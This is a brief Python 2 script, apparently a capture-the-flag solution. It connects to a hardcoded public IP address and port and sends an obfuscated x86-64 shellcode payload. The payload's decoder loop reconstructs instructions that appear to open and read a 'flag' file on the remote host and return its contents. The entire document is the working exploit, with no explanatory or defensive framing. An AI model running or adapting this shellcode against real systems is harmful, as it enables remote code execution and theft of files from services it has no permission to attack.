from socket import *
import telnetlib
from time import *
connectto = ('45.32.38.83', 13579 )
def main():
    S=socket(AF_INET,SOCK_STREAM)
    S.connect(connectto)
    print S.recv(1024)
    payload = "\xEB\x0E\x5E\xB3\x4e\x80\x6C\x33\xFF\x01\xFE\xCB\x75\xF7\xEB\x05\xE8\xED\xFF\xFF\xFF\x49\x32\xc1\x49\x32\xd3\x51\x49\xbc\x71\x66\x73\x30\x67\x6d\x62\x68\x54\x49\xbc\x64\x6c\x66\x73\x74\x60\x75\x7a\x54\x49\xbc\x30\x69\x70\x6e\x66\x30\x69\x62\x54\x49\x8a\xe8\x49\x8a\xd7\xb1\x03\x10\x06\x49\x84\xed\x31\x49\x8a\xc8\xb3\x31\x49\x8a\xe7\x49\x32\xc1\x10\x06\x49\x32\xc1\xff\xc1\x49\x8a\xc8\x10\x06\xc4"
    S.send(payload+"\n")
    sleep(1)
    print S.recv(1024)
    print S.recv(1024)
    
if __name__ == "__main__":
    main()
